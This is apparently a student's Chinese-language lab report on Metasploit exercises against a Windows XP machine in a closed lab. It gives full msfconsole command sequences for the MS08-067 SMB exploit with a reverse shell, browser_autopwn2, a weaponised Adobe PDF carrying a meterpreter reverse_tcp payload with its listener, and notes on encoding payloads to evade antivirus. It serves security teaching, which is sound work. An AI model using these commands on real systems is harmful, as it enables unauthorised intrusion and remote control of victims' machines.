2019-2020 - 2 网络对抗技术 20175235 Exp6 MSF基础应用

2019-2020-2 网络对抗技术 Exp6 MSF基础应用

20175235泽仁拉措

目录

一、实验过程

  • 1.主动攻击实践

    • ms08_067
  • 2.针对浏览器的攻击

    • browser_autopwn
  • 3.针对客户端的攻击

    • Adobe
  • 4.成功应用任何一个辅助模块

1.主动攻击实践

①ms08_067
  • 攻击机:kali

    • IP:192.162.206.133
  • 靶机:XP

    • IP:192.168.206.136
  • 步骤

    • 启动msfconsole,输入search ms08-067

    • 输入以下指令:

    use exploit/windows/smb/ms08_067_netapi
    show payloads
    set payload generic/shell_reverse_tcp //tcp反向回连
    set LHOST 192.168.182.133 //攻击机ip
    set LPORT 5235//攻击端口
    set RHOST 192.168.182.136 //靶机ip,特定漏洞端口已经固定
    set target 0 //自动选择目标系统类型,匹配度较高
    exploit //攻击
    

2.针对浏览器的攻击

browser_autopwn
  • 攻击机:kali

    • IP:192.162.206.133
  • 靶机:XP

  • IP:192.168.206.137

  • 步骤

    msfconsole
    use auxiliary/server/browser_autopwn2 
    set SRVHOST 192.168.206.133 
    set URIPATH auto
    show options
    exploit
    
  • 开始攻击

  • 成功

  • 上图

3.针对客户端的攻击

Adobe
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.206.133 //攻击机ip
set LPORT 5235//攻击端口
set FILENAME zrlc5235.pdf //设置生成pdf文件的名字
exploit //攻击

  • 将生成的pdf拷贝到靶机上

  • 在kali中输入back,输入以下指令;

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.206.133//攻击机ip
set LPORT 5235 //攻击端口固定
exploit

4.成功应用任何一个辅助模块

web漏洞扫描
  • 启动msfconsole.根据options设置相关参数,启动扫描

二、实验内容说明及基础问题回答

  • 1.用自己的话解释什么是exploit,payload,encode.

    • (1)exploit是执行渗透攻击,用来连接漏洞,将payload传输到目标靶机,进而实现对靶机的攻击。
    • (2)payload是载荷。指的是用于执行的攻击的数据、代码。
    • (3)encode是一个编码器,对payload进行包装处理,从而迷惑靶机达到免杀的效果。
  • 2.离实战还缺些什么技术或步骤?

    现在对漏洞的了解还很匮乏,更不要说利用漏洞去攻击了。而且实验都是在防火墙等安全防护都关闭的情况下进行的,对于日常其实实现起来应该比较困难。在利用后门程序之前也应该对其进行检测。

三、实验总结

这次实验主要就是按照步骤一步一步做,难度不是很大。
posted @ 2020-05-03 06:39  20175235  阅读(177)  评论(0编辑  收藏  举报